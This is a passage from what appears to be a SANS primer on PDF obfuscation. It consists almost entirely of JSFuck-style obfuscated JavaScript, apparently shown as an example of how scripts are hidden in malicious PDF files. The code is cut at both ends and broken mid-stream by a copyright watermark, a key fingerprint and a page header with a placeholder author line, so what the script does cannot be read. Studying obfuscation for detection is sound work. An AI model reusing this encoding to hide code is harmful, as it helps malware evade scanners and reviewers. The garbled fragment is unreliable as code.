[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+[![]]+[])[+[]])[+!+[]]+[][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!
+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()[(![]+[])[
+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+
(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!
+[]+!+[]]]()+[])[!+[]+!+[]]]((![]+[])[+!+[]]+(+[![]]+[])[+[]])[+[]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[]
)[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]
+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])
[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+
[![]]+[])[+[]])[+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]]([!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]])+(![
]+[])[+!+[]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+
[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+
(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][(![]+[])[+[]]+(!![]+[])[+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[
]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[
]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!
+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+
[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!
+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[]
[(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+
[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+[![]]+[])[+[]])[+!+[]]+[][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]
]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()[(![]+[])[+!+
[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[
]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+
!+[]]]()+[])[!+[]+!+[]]]((![]+[])[+!+[]]+(+[![]]+[])[+[]])[+[]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!
+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![
]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+
[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+[![]]
+[])[+[]])[+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]]([+!+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]])+(![]+[])
[+!+[]]+(([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[
])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[
]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]
+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][
(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[
!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][(![]+[])[+[]]
+(!![]+[])[+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 16
Author!Name,!email@address
+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])
[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!
+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[
]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[
]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![
]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+[![]]+[])[+[]])[+!+[]]+[][(![]+[])[!+[]+!+[]+!+[]]+(!
+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+
(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[
])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]
+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]]((![]+[])[+!+[]]+(+[![]]+[])[+[]])[+[]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]
]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[]
)[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([!
[]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+
[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+[![]]+[])[+[]])[+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])
[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]]([+!+[]]+[+!+[]]+[!+[]+!+[]])+(!![]+[])[+[]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[
+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])
[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][(![]+[])[+[]]+(!![]+[])[+!+[]]+(!+[]+[][(![]+[])[+
[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+
[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![
]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+
[]+[+!+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]
+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]
]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]
]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+[![]]+[])[+[]])[+!+[]]+[][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!
